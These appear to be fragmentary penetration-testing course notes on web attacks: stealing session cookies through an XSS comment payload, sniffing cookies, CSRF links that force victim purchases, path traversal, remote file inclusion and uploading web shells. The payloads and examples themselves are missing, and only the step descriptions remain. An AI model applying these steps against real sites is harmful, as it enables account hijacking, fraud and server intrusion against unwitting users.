Session Hijacking & Fixation

– e.g. comment page vulnerable to xss, so can insert payload there:

– open firebug → cookies tab → see if httponly tag is enabled [we have to be logged into our
own account]. If it's not means we can inject javascript and steal cookies;
– With php script to steal cookies set up on attacker site, this is the payload we can insert into
xss vulnerable comment page:

Now impersonate victim:

firebug → modify cookie to the one we've stolen;

Sniffing network traffic [local network] to steal cookie:

→ filter to be http only;

→ analyse get requests to login:

now to read cookie:

Third method:

→ requires a shell and read privileges on target webserver:

→ e.g. for a linux server:
Cross Site Request Forgery

– buy stuff that we're not supposed to;

intercept with burpe and send checkout request to decoder since there's some encoding:

decode as “url” by selecting url from drop down menu on right;

→ now forward request to see what happens – note doesn't appear to be any token in request that
would limit cross-site request forgery;

→ now force victim to purchase something by clicking on crafted link: e.g.

better is to force victim to visit site we own and silently issue the purchase request:

Files & Resources Vulns

Upload a test file and see the file= parameter which is first injection point:

if file= parameter is not sanitised, attacker could gain access to arbitrary files:

try and access root folder on this linux system:

use ../ to go up the file system tree. Try one at a time; we don't know how many we have to go up
by.

Also, test for errors by using filename that won't exist. Errors can be very useful:
→ in this warning, the full path we are after is at the end of the warning;

but if we have no error then we have to guess how many ../ locations we have to add to reach root:
once we are in root directory, all other ../ will be ignored. So use enough to guarantee that we will
be in root directory:

directing file=google.com and google page showing shows this parameter is vulnerable to remote
file inclusion:
now edit payload to include shell on target server: e.g. shell.txt; the shell.txt file should be located
on remote server:

unrestricted file upload:

– can lead to uploading shells;

– check source code to see path url for where stuff is normally uploaded to;
– example of shell working in this case: